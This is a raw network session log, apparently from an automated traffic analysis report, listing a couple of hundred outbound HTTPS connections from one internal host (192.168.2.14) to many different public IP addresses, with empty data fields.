                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19648192.168.2.1460368126.239.81.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19649192.168.2.145234870.180.47.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19650192.168.2.14601228.37.177.212443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19651192.168.2.1457132159.218.32.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19652192.168.2.144124638.83.198.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19653192.168.2.1458218145.202.59.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19654192.168.2.1436972196.119.106.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19655192.168.2.1450228117.166.196.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19656192.168.2.144251059.190.12.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19657192.168.2.144278646.127.42.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19658192.168.2.146075082.2.195.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19659192.168.2.1453104100.145.111.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19660192.168.2.1434832182.155.143.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19661192.168.2.1445382202.117.108.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19662192.168.2.1454728204.97.119.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19663192.168.2.144602252.204.93.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19664192.168.2.1450386175.180.2.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19665192.168.2.1438918156.22.22.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19666192.168.2.1458726200.242.142.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19667192.168.2.1440684134.122.131.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19668192.168.2.143461451.218.90.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19669192.168.2.145768299.117.130.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19670192.168.2.144837637.128.170.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19671192.168.2.1451140156.177.3.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19672192.168.2.1452932175.246.90.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19673192.168.2.1449626172.72.137.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19674192.168.2.144743099.70.225.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19675192.168.2.1454188136.206.159.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19676192.168.2.1435538173.236.169.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19677192.168.2.1447366134.243.59.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19678192.168.2.1435652219.176.27.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19679192.168.2.143493658.227.38.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19680192.168.2.1434818217.55.103.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19681192.168.2.1439836218.221.176.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19682192.168.2.1452946172.245.227.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19683192.168.2.144020877.93.168.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19684192.168.2.143814897.182.85.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19685192.168.2.145126279.160.244.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19686192.168.2.1460720114.154.117.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19687192.168.2.144910258.50.236.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19688192.168.2.1449924207.190.71.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19689192.168.2.1452124175.179.8.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19690192.168.2.1440374138.88.12.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19691192.168.2.1435338187.156.95.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19692192.168.2.14504402.105.53.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19693192.168.2.145719035.174.53.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19694192.168.2.1439142154.1.145.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19695192.168.2.1437264103.72.188.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19696192.168.2.1444326110.8.116.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19697192.168.2.145178271.143.219.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19698192.168.2.1443218176.39.155.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19699192.168.2.1451266177.160.227.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19700192.168.2.144998289.44.215.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19701192.168.2.1449302162.34.247.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19702192.168.2.145774845.224.5.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19703192.168.2.145078485.5.138.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19704192.168.2.146054238.194.92.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19705192.168.2.1439588150.50.246.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19706192.168.2.144828872.124.106.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19707192.168.2.1439582199.112.132.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19708192.168.2.144534854.172.208.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19709192.168.2.1444014126.81.109.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19710192.168.2.1442928160.254.132.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19711192.168.2.1443236146.234.5.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19712192.168.2.1460704145.13.31.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19713192.168.2.1434162173.50.210.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19714192.168.2.143382439.193.75.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19715192.168.2.1440642219.174.172.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19716192.168.2.1448304206.150.63.53443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19717192.168.2.145882019.215.20.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19718192.168.2.144764469.227.245.220443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19719192.168.2.14338685.33.26.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19720192.168.2.1440772144.101.211.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19721192.168.2.14540824.40.3.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19722192.168.2.1445830147.49.98.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19723192.168.2.1436942140.32.181.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19724192.168.2.1441624118.207.26.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19725192.168.2.1441800134.120.74.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19726192.168.2.144095260.249.55.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19727192.168.2.144683466.5.118.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19728192.168.2.1433864146.7.23.97443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19729192.168.2.143838874.151.55.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19730192.168.2.144191669.251.121.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19731192.168.2.1439034100.188.193.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19732192.168.2.1438522165.64.54.170443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19733192.168.2.144827493.27.104.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19734192.168.2.143673475.135.232.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19735192.168.2.1438728169.84.140.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19736192.168.2.145035093.89.64.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19737192.168.2.1438116111.168.24.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19738192.168.2.145094480.205.33.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19739192.168.2.1442988218.73.89.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19740192.168.2.1435826125.88.230.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19741192.168.2.144450220.202.193.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19742192.168.2.145560814.31.30.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19743192.168.2.1447474199.102.17.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19744192.168.2.145354651.227.211.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19745192.168.2.1456630222.171.186.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19746192.168.2.1458958219.73.105.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19747192.168.2.1459728184.231.64.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19748192.168.2.1458584111.159.118.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19749192.168.2.1444244158.143.93.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19750192.168.2.1450990135.120.224.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19751192.168.2.1436146179.144.191.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19752192.168.2.145276812.144.210.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19753192.168.2.145447057.56.6.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19754192.168.2.1456958131.86.106.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19755192.168.2.1452394161.87.82.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19756192.168.2.1460792129.142.171.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19757192.168.2.1441860223.33.24.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19758192.168.2.1437886200.217.16.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19759192.168.2.145500872.86.150.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19760192.168.2.144568444.8.160.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19761192.168.2.1438520124.27.3.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19762192.168.2.143967417.59.115.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19763192.168.2.145565078.227.55.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19764192.168.2.144038075.131.38.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19765192.168.2.144366617.191.138.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19766192.168.2.145135681.210.234.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19767192.168.2.1453470111.39.230.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19768192.168.2.144501668.237.47.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19769192.168.2.14338761.222.214.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19770192.168.2.145857858.231.222.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19771192.168.2.145951227.84.112.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19772192.168.2.145268623.196.61.41443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19773192.168.2.1441522188.56.161.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19774192.168.2.1438770173.5.204.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19775192.168.2.144267091.169.41.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19776192.168.2.144509458.223.62.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19777192.168.2.1445474143.250.64.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19778192.168.2.1454750145.3.90.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19779192.168.2.143381013.48.56.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19780192.168.2.145140288.120.209.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19781192.168.2.145439062.142.254.33443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19782192.168.2.143402262.207.128.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19783192.168.2.1441368169.228.247.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19784192.168.2.1439384211.21.177.227443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19785192.168.2.1439838119.66.228.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19786192.168.2.1444126218.234.19.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19787192.168.2.1453994195.194.180.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19788192.168.2.1434344206.60.41.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19789192.168.2.1458970204.2.153.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19790192.168.2.145830283.202.109.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19791192.168.2.144836278.41.127.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19792192.168.2.1438854190.68.111.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19793192.168.2.1436776143.20.17.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19794192.168.2.14519742.36.228.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19795192.168.2.1433050202.175.84.214443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19796192.168.2.144998450.174.14.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19797192.168.2.144533851.92.207.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19798192.168.2.143755039.19.135.8443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19799192.168.2.145011277.54.91.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19800192.168.2.1451420154.78.134.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19801192.168.2.1436452134.230.94.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19802192.168.2.145986014.81.126.195443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19803192.168.2.144756031.159.110.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19804192.168.2.1444456135.235.223.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19805192.168.2.1436248128.127.69.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19806192.168.2.143773261.234.87.153443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19807192.168.2.1442460169.45.214.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19808192.168.2.1439100160.219.234.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19809192.168.2.1441370163.152.176.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19810192.168.2.145718638.63.34.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19811192.168.2.1459558101.194.175.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19812192.168.2.144930894.53.240.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19813192.168.2.14379989.223.121.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19814192.168.2.1446332202.56.223.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19815192.168.2.1459206182.23.94.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19816192.168.2.1454488164.200.149.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19817192.168.2.144083818.174.246.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19818192.168.2.143356637.96.135.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19819192.168.2.1451442219.206.121.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19820192.168.2.145948887.198.44.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19821192.168.2.1441306208.195.41.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19822192.168.2.143651053.95.113.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19823192.168.2.1434262112.165.46.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19824192.168.2.144257420.137.14.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19825192.168.2.1435102139.13.132.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19826192.168.2.144650096.140.157.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19827192.168.2.1436498124.250.155.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19828192.168.2.1433896192.99.245.40443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19829192.168.2.145220439.183.2.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19830192.168.2.1436784188.48.199.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19831192.168.2.144148258.168.34.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19832192.168.2.1442360177.18.37.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19833192.168.2.1437988138.253.233.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19834192.168.2.145312493.107.35.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19835192.168.2.143430676.214.195.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19836192.168.2.1438966181.24.248.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19837192.168.2.1457344108.59.212.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19838192.168.2.143351281.249.53.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19839192.168.2.1458844167.97.188.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19840192.168.2.1454398100.13.193.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19841192.168.2.145199054.109.63.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19842192.168.2.144325865.37.223.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19843192.168.2.1447348140.47.68.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19844192.168.2.143733080.152.236.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19845192.168.2.1440100171.30.56.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19846192.168.2.1437844196.215.236.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19847192.168.2.1452526216.77.199.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19848192.168.2.1444620109.188.10.65443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19849192.168.2.1452570203.89.160.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19850192.168.2.1444850114.95.229.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19851192.168.2.1433832100.165.156.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19852192.168.2.144015466.193.112.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19853192.168.2.1448252175.58.68.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19854192.168.2.1454576145.139.203.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19855192.168.2.1453702122.64.230.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19856192.168.2.1441716199.188.198.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19857192.168.2.1438054132.240.142.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19858192.168.2.143991217.112.144.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19859192.168.2.1434186139.29.210.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19860192.168.2.1452044104.91.87.103443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19861192.168.2.1453310139.35.234.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19862192.168.2.143901470.28.2.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19863192.168.2.144449095.230.115.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19864192.168.2.1439884181.99.144.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19865192.168.2.143758697.115.13.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19866192.168.2.1450342125.28.126.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19867192.168.2.1453468155.177.44.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19868192.168.2.1440862202.121.130.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      19869192.168.2.144563413.42.130.35443
